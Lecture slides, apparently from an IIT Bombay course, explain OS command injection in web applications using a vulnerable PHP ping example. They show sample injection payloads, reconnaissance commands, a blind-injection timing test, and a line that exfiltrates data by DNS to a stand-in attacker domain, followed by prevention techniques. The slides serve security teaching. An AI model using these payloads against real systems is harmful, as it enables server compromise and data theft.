Command Injection

Kameswari Chebrolu
Department of CSE, IIT Bombay
 Command Injection
● Attacker can execute arbitrary (OS) commands
on a host running the server
– Occurs when a web applications runs OS commands
to interact with the host and file systems
– Exploits an application vulnerability, such as
insufficient input validation
● Can fully compromise the application and its
data
– Can also compromise other systems in the
organization exploiting trust relationships
● Hard with programming languages like Java that
run in a virtual machine
– Also doesn’t gel with their philosophy
● Applications should be designed to be portable between
different operating systems → Cannot rely on specific OS
functions
● OS commands are are more common with
interpreted languages (e.g. PHP, Ruby, Python)
– Python and Ruby are popular for scripting tasks →
they support OS command execution well!
 Code vs Command Injection
● Code injection: any type of attack that involves
injection of code
– Malicious code is executed in the the language of
the application and within the application context
– Made possible by a lack of proper data validation
– Confined to the application or system (depends on
permissions granted)
– Examples: XSS (javascript code injection),
complex deserialization attacks
● Command injection: any type of attack that
involves executing commands in a system shell
– Shell: A command-line interpreter that provides a
user interface for accessing an operating system's
services
– Extends default functionality of the application
● No malicious code is involved
– Often gives attacker greater control over the target
system
1. Attacker sends 2. Server executes
shell payload command

4. Page with output is 3. OS returns output

sent back if any
 Testing the ground
● Consider a server that checks if a specified server is reachable
– URL: https://vulnerable-website.com/pingStatus?domain=www.cse.iitb.ac.in
– PHP code may look like this
● echo ‘<pre>’
● $domain = $_GET[domain];
● echo shell_exec("ping -c 1 $domain");
● echo ‘</pre>’

shell_exec function executes a shell command and returns output as a string

echo will print the output
● Attacker could submit
– https://vulnerable-website.com/pingStatus?domain=w
ww.cse.iitb.ac.in; echo gotcha
– “;” chains commands together (in bash)
– echo outputs the string supplied
● If attacker sees a “gotcha” in the reply → attack
feasible
● Earlier injected command echo is pretty
harmless!
● More dangerous commands can permit attacker
to explore filesystem, read sensitive information,
and compromise the entire application
– id command can identify which “user” is running the
web application on the server
● The corresponding user permissions determine severity of
vulnerability
– cat command can permit attacker to read site’s code
 Note
● Different OS have different command
separators
– ; and && and || can work in Linux
– & is used in Windows
 Other Useful Commands
● Name of current user: whoami (both linux and
windows)
● Operating system: uname -a (linux); ver (windows)
● Network configuration: ifconfig (linux); ipconfig /all
(windows)
● Network connections: netstat -an (both)
● Running processes: ps -ef (linux); tasklist (windows)
● Directory: ls (linux); dir (windows)
 Blind Command Injection
● Application does not return the output of the
command in HTTP response
● How to check?
– Inject the following: “; ping -c 10 127.0.0.1”
– The above command will cause app to ping the
loopback address for 10 sec (10 packets, one every
sec)
– Will trigger a time delay which confirms command
was executed
How to exploit?
● Redirect output of injected command to a file in

webroot
● File can then be retrieved by the browser

● Example:
– Injection command: “www.cse.iitb.ac.in; whoami >
/var/www/static/whoami.txt ;”
● Applications often serve static content from /var/www/static
● > character redirects output of command “whoami” to the
specified file in webroot
– Browser can fetch the file via
https://vulnerable-website.com/whoami.txt
Another example:
● Injected command: “www.cse.iitb.ac.in; dig

`whoami`.web-attacker.com”
– Backtick performs inline execution of an injected
command within the original command
– This causes a DNS lookup to attacker’s domain
● Attacker can parse the query to extract the sensitive info
 Prevention
● Do not call OS commands from
application-layer code
– Use safer platform based APIs
– E.g. If developer wants to send mail using PHP
● Do not use mail command available in OS
● Use mail() function in PHP
– Can enforce this by disabling dangerous function
● E.g. configure the php.ini file to block dangerous
commands by adding below line
– disable_functions=exec,passthru,shell_exec,system
● If unavoidable (e.g. ping is not supported in
PHP), do input validation
– Validate against a whitelist of permitted value
– Validate that the input is a number or an IP address
(based on context)
– Validate input contains only alphanumeric
characters, no other syntax or whitespace
– Remember input can come not only from
GET/POST but also from HTTP headers, JSON or
XML data etc
● If possible, avoid blacklisting or sanitizing input by
escaping shell metacharacters
– Too error prone, determined attacker can often bypass
– In PHP, you could use escapeshellarg and
escapeshellcmd functions
● $domain = escapeshellarg($_GET['domain']);
– If blacklisting is unavoidable, filter or escape the
following special characters:
● Windows: ( ) < > & * ‘ | = ? ; [ ] ^ ~ ! . ” % @ / \ : + , `
● Linux: { } ( ) < > & * ‘ | = ? ; [ ] $ – # ~ ! . ” % / \ : + , `
● To escape shell characters, one can also invoke calls with
arrays instead of strings
● In Python, (first option is bad, uses string!)
● from subprocess import call

command = "dig" + domain

call(command)
vs
● from subprocess import call

call(["dig", domain])
● In Ruby (similar to Python)
● system("dig #{domain}")
vs
● system("dig", domain)
● Automate testing for command injection in
build pipeline
 Real World Example
Polyvore ImageMagick:
https://nahamsec.wordpress.com/2016/05/09/expl
oiting-imagemagick-on-yahoo/
 Summary
● Command Injection allows attacker to execute
arbitrary (OS) commands on a host running the
server
– Difficult in Java, but possible in PHP, Python, Ruby
● Dangerous commands can permit attacker to
explore filesystem, read sensitive information, and
compromise the entire application
– Blind command injection can also be leveraged
● Prevention: do not call OS commands; input
validation via whitelisting, blacklisting, automate
testing for injection
 References
● https://portswigger.net/web-security/os-comma
nd-injection